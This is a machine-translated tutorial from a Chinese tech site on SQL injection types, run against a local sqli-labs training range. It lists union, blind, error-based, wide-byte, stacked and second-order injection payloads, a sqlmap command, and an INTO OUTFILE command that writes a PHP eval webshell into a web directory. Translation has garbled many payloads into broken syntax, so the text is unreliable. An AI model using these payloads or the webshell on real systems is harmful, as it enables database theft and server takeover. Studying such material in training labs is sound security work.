Shulou(Shulou.com)05/31 Report--

Most people do not understand the knowledge points of this article, "what are the common types and principles of SQL injection?", so the editor summarizes the following, detailed contents, clear steps, and a certain reference value. I hope you can get something after reading this article. Let's take a look at this "what are the common types and principles of SQL injection".

Mysql Foundation

Mysql installation

Here we directly use mysql in the phpstudy integrated environment

Mysql common commands

(1) mysql local connection

Mysql-h localhost-uroot-proot

Parameter description

-h represents the database connection address, the connection to this machine can not be filled in, directly mysql-uroot-p

-u represents the user to log in

-p means to log in with a password

Default account / secret: root/root

Note: when logging in to mysql, the-p cannot be followed by a space plus a password, but the-p space is OK without adding a value.

(2) View all databases

Show databases

(3) when using the database, pay attention to the semicolon after the sql statement.

Use database name

(4) View the tables in the current database

Show tables

(5) View the field structure in the table without exposing the content.

Describe table name

(6) View all the fields and contents in the table (provided that the database has been use)

Select * from table name

(7) write the word peak.php Trojan to the specified directory, such as C:\ WWW directory

Select "into outfile" C:\\ WWW\\ peak.php "

Or

Select 0x3c3f70687020406576616c28245f524551554553545b7065616b5d293b3f3e into outfile "C:\\ WWW\\ peak.php"

Note:

If you use C:\ WWW\ peak.php, the WWWpeak.php file will be generated in the MYSQL\ data directory instead of the specified directory.

In addition, don't add "" when using Hex coding.

(8) create a database

Create database peak

(9) Delete database

Drop database library name

(10) clear the table

Delete from table name

(11) modify root password

Mysqladmin-uroot-p password new password

After entering the original password, the password will be modified successfully.

(12) query the directory of the current database

Select @ @ basedir

(13) create a database

CREATE DATABASE [IF NOT EXISTS]

(14) create tables

CREATE TABLE table_name (column_name column_type)

(15) create a field

INSERT INTO users (field name) VALUES ("field value")

(16) Delete data from the table

DELETE FROM [WHERE clause] [ORDER BY clause] [LIMIT clause]

Key information analysis

(1) information_schema

In MySQL, think of information_schema as a database, or rather an information database. It holds information about all other databases maintained by the MySQL server. Such as the name of the database, the table of the database, the data type and access rights of the table column, etc.

(2) description of common parameters of information_schema database table:

SCHEMATA table: provides information about all databases in the current mysql instance. This table is taken from the results of show databases. TABLES table: provides information about the tables in the database (including views). Detailed description of a table belongs to which schema, table type, table engine, creation time and other information. This table is taken from the results of show tables from schemaname. COLUMNS table: provides column information in the table. Details all the columns of a table and the information for each column. This table is taken from the results of show columns from schemaname.tablename. Sql-labs environment building

Shooting range environment:

Https://github.com/Audi-1/sqli-labs

SQL injection principle

What is SQL injection?

SQL injection means that attackers destroy the structure of SQL query statements by injecting malicious SQL commands, so as to achieve the purpose of executing malicious SQL statements. The harm of SQL injection vulnerabilities is huge, often causing the entire database to "take off its pants". Nevertheless, SQL injection is still one of the most common Web vulnerabilities

SQL injection step

(1) to judge whether there is injection and whether the injection is character or digital.

(2) guess the number of fields in the SQL query statement

(3) determine which location fields can be injected and utilized.

(4) query database (currently using database or all databases)

(5) query the tables in the specified database

(6) query the field name in the specified table

(7) query the values of fields in the table

Common SQL injection types (subdivided into seven types)

SQL injection can be divided into two broad categories:

Non-blind injection and blind injection, non-blind injection means that there are reported errors, and blind injection means that there are no reported errors

Common SQL injection methods are:

Joint injection

Boolean blind injection

Time blind injection

Wide byte injection

Error injection

Stack injection

Secondary injection

Digital / character injection judgment

First of all, id is followed by single quotation marks to check whether there may be sql injection. It returns normal, but does not exist; abnormal return exists.

Suppose ip/?id=1

Numeric, the parameter is not surrounded by quotation marks:

The page returned by id=1 and 1 is normal.

The page returned by id=1 and 1 / 2 is not normal.

The page returned by id=1' and'1 is not normal.

The returned page of id=1' and'1 abnormal response 2 is abnormal.

Character type, the parameter is surrounded by quotation marks:

Id=1 and 1: 1 returns normal or error page

Id=1 and 1: 2 returns normal or error page

The page returned by id=1' and'1 is normal.

The returned page of id=1' and'1 abnormal response 2 is abnormal.

Two testing methods are summarized.

And 1 / 2 is normal, 1 / 2 is abnormal, there may be digital injection / and 1 / 1 normal or error, 1 / 2 normal or error, there may be character injection

Abnormal in 'and' 1, and possible in character injection

0x01: joint injection

Principle

(1) union select definition

Merge the results of multiple SELECT statements into one result set

(2) mysql intuitive test

SELECT * FROM users WHERE id='1' union select * from users where id=2

Test environment

Pass-1

Correlation function

Group_concat (parameter 1, parameter 2, parameter 3, etc.) syntax: the group_concat function returns a string result (that is, a line), which is composed of the values of the parameters in parentheses and then concatenated.

Char (): restore ASCII codes to characters

Injection process

1. First determine whether there is sql injection in the target and what type of sql injection it is.

Http://127.0.0.1/sqli-labs/Less-1/?id=1 / / return correct http://127.0.0.1/sqli-labs/Less-1/?id=1' / / return error There may be a SQL injection http://127.0.0.1/sqli-labs/Less-1/?id=1 and 1room1 / / return the correct http://127.0.0.1/sqli-labs/Less-1/?id=1 and 1room2 / / return the correct http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1room1 / / return the error http://127.0.0.1 / sqli-labs/Less-1/?id=1' and 1room2 / / return error can be seen from this $id may be followed by a sql statement http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1: 1-- + / / returns the correct http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1: 2-- + / / returns an error, which shows that the target has sql injection and is of character type, and that the id variable is followed by other sql statements. At this time, let's take a look at the source code to see if it is a character type.

2. Test steps

(1) use union select to guess the number of fields after select in the target SQL query statement, and also measure where the target fields can continue to be used.

(2) judgment method: echo error indicates more than the current number of fields, and echo correctly indicates that there are so many fields.

Payload: http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1century 2 union select 1jue 2jue 3% 23

Note: the purpose of and 1 statement 2 here is to not display the correct id=1, return an error and display the value of the following union select statement, because sometimes the target website is set to echo only one database statement, which is easy to cause mistakes in judgment.

Result: here the number of fields after select in the SQL query statement is 3, and the field 2 can be used.

(3) Payload

Http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1, 2 union select 1, 3% 23 http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1, (select group_concat (schema_name) from information_schema.schemata), 3% 23 http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1, union select 1 (select group_concat (table_name) from information_schema.tables where table_schema=database ()), 3% 23 http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1 / 2 union select 1, (select group_concat (column_name) from information_schema.columns where table_name='users'), 3% 23 http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1 / 2 union select 1, (select group_concat (username,char (32), password) from users) 3% 23

(4) expansion

There is another method, order by determines the number of fields.

Http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1 percent 2 order by 1% 23

Specific analysis of specific situation

0x02: Boolean blind injection

Principle

The page of Web only returns True and False, so Boolean blind note is to get the relevant information in the database according to the True or False returned by the page.

Test environment

Pass-8

Correlation function analysis

(1) length: returns the byte length of the string

(2) ascii: a function that converts characters into ascii code values

(3) substr (str, pos, len): intercepts len characters from the position starting from pos (starting position is 1) in str

(4) count: a function recorded in a statistical table that returns the number of rows for matching conditions

(5) limit:

Limit m: retrieves the first m rows of data, displaying 1-10 rows of data (m > 0)

Limit (xQuery y): retrieves y rows of data starting from line xpen1

Injection process

1. Judge the length of the database name

Http://127.0.0.1/sqli-labs/Less-8/?id=1' and (length (database () = 8% 23

2. Guess the database name

Http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii (substr ((select database ()), 1Pol 1) = 115% 23 http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii (substr ((select database ()), 2jue 1) = 101% 23 http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii ((select database () ) = 99% 23 http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii (substr ((select database ()), 4 Magazine 1) = 117% 23 http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii (substr ((select database ()), 5 http://127.0.0.1/sqli-labs/Less-8/?id=1' 1) = 114% 23 http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii ((select database () ) = 105% 23 http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii (substr ((select database ()), 7 http://127.0.0.1/sqli-labs/Less-8/?id=1' 1) = 116% 23 http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii (select database ()), 8 Magi 1) = 121% 23

3. Judge the number of tables in the database

Http://127.0.0.1/sqli-labs/Less-8/?id=1' and (select count (table_name) from information_schema.tables where table_schema=database ()) = 4% 23

4. Guess the length of the fourth table name

Http://127.0.0.1/sqli-labs/Less-8/?id=1' and (length ((select table_name from information_schema.tables where table_schema=database () limit 3Jing 1) = 5% 23

5. Guess the fourth table name

Http://127.0.0.1/sqli-labs/Less-8/?id=1' and (length ((select table_name from information_schema.tables where table_schema=database () limit 3 http://127.0.0.1/sqli-labs/ 1) = 117% 23 http://127.0.0.1/sqli-labs/Less-8/?id=1' and (length ((select table_name from information_schema.tables where table_schema=database () limit 3 Magne1) = 115% 23 http://127.0.0.1/sqli-labs/ Less-8/?id=1' and (length ((select table_name from information_schema.tables where table_schema=database () limit 3Magne1) = 101% 23 http://127.0.0.1/sqli-labs/Less-8/?id=1' and (length ((select table_name from information_schema.tables where table_schema=database () limit 3Power1) = 114% 23 http://127.0.0.1/sqli-labs/Less-8/?id=1' and (length ((select table_name) From information_schema.tables where table_schema=database () limit 3jue 1)) = 115% 23 the fourth table is named users

6. Judge the number of fields in the users table

Http://127.0.0.1/sqli-labs/Less-8/?id=1' and (select count (column_name) from information_schema.columns where table_name='users') = 3% 23

7. Judge the length of the second field

Http://127.0.0.1/sqli-labs/Less-8/?id=1' and length ((select column_name from information_schema.columns where table_name='users' limit 1pl)) = 8% 23

8. Guess the second field name

Http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii (substr ((select column_name from information_schema.columns where table_name='users' limit 1, 1), 1) = 117% 23. The name of the second field is username Note: substr (parameter 1, parameter 2, parameter 3). Both 0 and 1 in parameter 2 can start with the first character, but here you can only use 1Power0. It may have something to do with the database version.

9. Guess the number of values in the specified field

Http://127.0.0.1/sqli-labs/Less-8/?id=1' and (select count (username) from users) = 13% 23

10. Guess the length of the first value in the first field

Http://127.0.0.1/sqli-labs/Less-8/?id=1' and length ((select username from users limit 0Pol 1)) = 4% 23

11. Guess the name of the first value in the first field

Http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii (substr ((select username from users limit 0jue 1), 1pm 1)) = 68% 23. The final value is Dumb0x03: time blind

Principle

The general idea of time blind injection is delay injection, that is, using functions such as sleep () or benchmark () to make the execution time of mysql longer and combined with the judgment conditional statement if (expr1,expr2,expr3), and then through the response time of the page to determine whether the value returned by the statement is True or False, so as to guess some unknown fields.

Test environment

Less-9

Correlation function

If (expr1,expr2,expr3): if the value of expr1 is TRUE, the return value is expr2; if the value of expr1 is FALSE, the return value is expr3

Sleep (n): delay response time n seconds

Payload

Http://127.0.0.1/sqli-labs/Less-9/?id=1' and if (ascii ((select database ()), 1))% 23 http://127.0.0.1/sqli-labs/Less-9/?id=1' and (length (database () = 8 and if (substr ((select database () = 8 and if (substr ((select database ()), 1Jing 1)) = 115 and if Sleep (4), null)% 230x04: wide byte injection

Principle

When there is wide byte injection, put% df%27 in the injection parameter to eat (% 5c), that is, the combination of% df and% 5c into the Chinese character df.

Test environment

Pass-32

Payload

Http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1pm 2 union select 1 union select 3% 23 http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1pm 2 union select 1, (select group_concat (schema_name) from information_schema.schemata), 3% 23 http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1pm 2 union select 1 (select group_concat (table_name) from information_schema.tables where table_schema=database ()), 3% 23 http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1 / 2 union select 1, (select group_concat (column_name) from information_schema.columns where table_name='users'), 3% 23 http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1 / 2 union select 1, (select group_concat (username,char (32)) Password) from users), 3%230x05: error injection

Principle

Error injection obtains information by misusing a special function and causing it to output the error result.

Test environment

Pass-5

Correlation function

Concat () function: used to concatenate multiple strings into one string floor (x) function: returns the maximum integer value less than x rand () function calls: group by statement that can generate a random number between 0 and 1: group the result set according to one or more columns updatexml (target xml document, xml path, updated content): function to update xml document Xpath_expr: need to update the xml path (Xpath format) new_xml: updated content this function is used to update the contents of the selected XML fragment, replace a single part of the given fragment marked by XML with xml_target 's new XML fragment new_xml, and then return the changed XML. The part replaced by xml_target matches the XPath expression provided by the xpath_expr user. Extractvalue (target xml document, xml path): a function that queries an XML document, a XML tag fragment xml_frag and an XPath expression xpath_expr (also known as a locator); it returns the text () of the first text node of the CDATA, which is a child of the element that the XPath expression matches. The first parameter can be passed into the target xml document, the second parameter is the search path represented by the Xpath path method, the position in the second parameter xml is operable, and the search character position in the xml document is / xxx/xxx/xxx/. This format, if we write in another format, will report an error and return the illegal format content we wrote, which is what we want to query.

Referenc

Https://blog.51cto.com/wt7315/1891458

0x05-1:floor error injection

Payload

Http://127.0.0.1/sqli-labs/Less-5/?id=1' union select null,count (*), concat (database (), floor (rand (0) * 2) x from information_schema.tables group by x% 23 http://127.0.0.1/sqli-labs/Less-5/?id=1' union select null,count (*), concat ((select table_name from information_schema.tables where table_schema='security' limit 0jue 1)) Floor (rand (0) * 2) x from information_schema.tables group by x% 23 http://127.0.0.1/sqli-labs/Less-5/?id=1' union select null,count (*), concat ((select column_name from information_schema.columns where table_name='users' limit 0Power1), floor (rand (0) * 2) x from information_schema.tables group by x% 23 http://127.0.0.1/sqli-labs/Less-5/?id=1' union select null,count (*) Concat ((select username from users limit 0jue 1), floor (rand (0) * 2) x from information_schema.tables group by x%230x05-2:updatexml error injection

Payload

Http://127.0.0.1/sqli-labs/Less-5/?id=1' union select updatexml (1 ~', (database ()),'~'), 3)% 23 http://127.0.0.1/sqli-labs/Less-5/?id=1' union select updatexml (1 ~', (select table_name from information_schema.tables where table_schema='security' limit 0 ~ 1),'~') 3) 23 http://127.0.0.1/sqli-labs/Less-5/?id=1' union select updatexml (1 230x05 concat ('~', (select column_name from information_schema.columns where table_name='users' limit 0 union select updatexml 1),'~'), 3) 23 http://127.0.0.1/sqli-labs/Less-5/?id=1' union select updatexml (1 recorder concat ('~', (select username from users limit 0 charge 1),'~'), 3)% 230x05-3:extractvalue error injection

Payload

Http://127.0.0.1/sqli-labs/Less-5/?id=1' union select extractvalue (null,concat (0x7e, (database (), 0x7e)) 23 http://127.0.0.1/sqli-labs/Less-5/?id=1' union select extractvalue (null,concat ('~', (select table_name from information_schema.tables where table_schema='security' limit 0L1)) '~')% 23 http://127.0.0.1/sqli-labs/Less-5/?id=1' union select extractvalue (null,concat ('~', (select column_name from information_schema.columns where table_name='users' limit 0Power1),'~'))% 23 http://127.0.0.1/sqli-labs/Less-5/?id=1' union select extractvalue (null,concat ('~', (select username from users limit 0Power1),'~'))% 230x06: stack injection

Principle

Stack injection, in contrast to joint queries limited to select statements, can be used to execute arbitrary SQL statements. To put it simply, it is the multi-statement query of MYSQL.

Limitations of stack injection: stack injection can not be performed in any changing environment and may be limited by API or database engine support (such as Oracle databases), or insufficient permissions. In the web system, because the code usually returns only one query result, the stack injection of the second statement produces an error or the result can only be ignored, we can not see the return result in the front-end interface.

Test environment

Pass-38

Payload

Http://127.0.0.1/sqli-labs/Less-38/?id=1';create database peak%230x07: secondary injection

Principle

Secondary injection can be understood as the injection caused by malicious data constructed by an attacker when the malicious data is read and entered into the SQL query statement after the malicious data is stored in the database. The defender may escape the special characters when the user enters malicious data, but the data processed when the malicious data is inserted into the database is restored and stored in the database (for example, although parameters are added after filtering to escape, "" is not inserted into the database), when the Web program calls the malicious data stored in the database and executes the SQL query. The secondary injection of SQL occurs.

Secondary injection can be summarized as the following two steps:

Step 1: insert malicious data

When inserting data into the database, the special characters are escaped, and the original data is retained when it is written to the database.

Step 2: quote malicious data

The data stored in the database by default is safe for developers. When querying, malicious data is directly extracted from the database without further verification.

Test environment

Pass-24

Payload

(1) first create a user amin'# with comments

(2) check the database and successfully add the record.

(3) Analysis of source code sql statements:

Original SQL statement: UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' change password sql statement: the last real sql statement executed by UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass': UPDATE users SET PASSWORD='$pass' where username='admin'

(4) change the password of admin'# finally.

(5) change the password of admin successfully

SQL injection-File read and write

Principle

Use the read and write permission of the file to inject, it can write a sentence Trojan, can also read the sensitive information of the system file

Utilization condition

The parameter secure_file_priv is used to restrict data import and export.

Secure_file_priv=

The representative has no restrictions on reading and writing documents.

Secure_file_priv=NULL

The representative cannot read or write documents.

Secure_file_priv=F:

The representative can only read and write the files under this path.

Note

Viewing method: show global variables like'% secure%'

Modify method: my.ini function. If not, add it directly.

Correlation function

Load_file (): reading files

Into outfile: writing to fil

Test environment

Pass-1

Read the file

Http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1 loading file ('F:\ 1.txt'), 3% 23

Write a file

Http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1 into outfile'F:\ 2.php'%23

Common parameters of sqlmap

Sqlmap download address

Http://sqlmap.org/

Common parameters

-u: specify URL--dbs with parameters: expose database-- batch: default-select execution-- random-agent: use random user-agent-r:POST injection-- level: injection level. There are 5 levels (1-5). If level is not added, the default is 1, and level 5 contains the most payload, and will automatically crack cookie, XFF and other header injection. Correspondingly, its speed is relatively slow-- timeout: set retry timeout-- cookie: set cookie information-- flush-session: delete the specified target cache and test the target again-- tamper: use waf bypass script-- time-sec: set delay time, default is 5 seconds-- thread: multithreading, default is 1, maximum is 10--keep-live: sqlmap is closed immediately after a successful connection. The HTTP message is equivalent to Connection: Close (one connection closes immediately). When the URL of a site is scanned for a long time, it consumes more performance, so you need to persist the HTTP connection to improve the scanning performance; HTTP message is equivalent to Connection: Keep-Alive

Example

Py-3 sqlmap.py-u "http://127.0.0.1/sqli-labs/Less-8/?id=1"-- dbs-- random-agent-- batch above is the content of this article about" what are the common types and principles of SQL injection? "I believe you all have a certain understanding. I hope the content shared by the editor will be helpful to you. If you want to know more about it, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.